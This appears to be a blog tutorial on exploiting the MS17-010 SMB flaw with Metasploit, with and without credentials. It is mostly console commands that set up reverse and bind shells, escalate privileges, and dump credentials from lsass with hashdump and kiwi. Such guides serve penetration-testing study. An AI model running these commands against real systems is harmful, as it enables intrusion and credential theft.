EvilSaint Wordmark

Remote Exploit MS17-010

27 Mar 2021, 11 p.m.
26 Feb 2022, 6:23 p.m.
03:14 minutes

This article serves as a quick reference to exploiting the MS17-010 with the Metasploit Framework. This article is for educational purposes only.

    This article demonstrates how to exploit the MS17-010 vulnerability with the Metasploit Framework. This article is for educational purposes only.

    Two methods are demonstrated; with and without compromised credentials. This article does not discuss the vulnerability and its background.

    Method 1 - MS17-010 exploitation without credentials: EternalBlue

    Step 1 - Launch Metasploit and choose the `ms17_010_eternalblue` exploit
    msfconole
[...]
use exploit/windows/smb/ms17_010_eternalblue
    Step 2 - Configure options for your target

    Configure your exploit to run with options that are specific to your target. Note that setting the remote port is optional, this is 445 by default

    show targets
set TARGET <id>
set RHOST <target IP>
set RPORT <target port> (445 by default)
    Step 3 - Configure options for your machine

    Configure options for your machine with. 

    set LHOST <your IP>
set LPORT <port of your choice>
    Step 4 - Optional: Configure a payload

    This step is optional. By default, windows/x64/meterpreter/reverse_tcp is used.

    show PAYLOADS

    Choose and set a payload with:

    set PAYLOAD <payload>
    Step 5 - Exploit

    To run the exploit use:

    exploit

    A reverse connection is initiated upon successful exploitation.

    For post-exploitation tips, see step 6 of the below instructions.

    MS17-010 Exploitation - With credentials: PSExec

    This example requires credentials to run. This example is done using a domain-joined target.

    Step 1 - Launch Metasploit and choose the `ms17_010_psexec` exploit
    msfconole
[...]
use exploit/windows/smb/ms17_010_psexec
    Step 2 - Configure options for your target

    Configure your exploit to run with options that are specific to your target. Note that setting the remote port is optional, this is 445 by default

    show TARGETS
set TARGET <id>
set RHOST <target IP>
set RPORT <target port> (445 by default)
set SMBUSER <user>
set SMBPASS <password>
set SMBDOMAIN <domain>
    Step 3 - Configure options for your machine
    set LHOST <your IP>
set LPORT <port of your choice>
    Step 4 - Optional: Configure a payload

    This step is optional. By default, windows/x64/meterpreter/reverse_tcp is used.

    show PAYLOADS

    Choose and set a payload with:

    set PAYLOAD <payload>

    For example, to use a smaller bind payload (stageless), you can choose:

    set PAYLOAD generic/shell_bind_tcp
    Step 5 - Exploit

    To run the exploit use:

    exploit
    Step 6 - Optional: Post-Exploitation

    If you used a non-meterpreter payload, you can upgrade it to Meterpreter using:

    CTRL + Z (background session)
use post/multi/manage/shell_to_meterpreter
sessions -l
set session <session id>
set LHOST <your IP>
set LPORT <port of your choice>
exploit

    Note: You may need to run this a few times to upgrade the shell.

    Once you have upgraded your shell, you can escalate your privileges.

    session -i <meterpreter session>
getsystem

    To migrate process and dump credentials, use:

    ps
migrate -N lsass.exe
hashdump
load kiwi
creds_all

    Captcha: What's the standard TCP port of the following service?

    captcha

    0 comments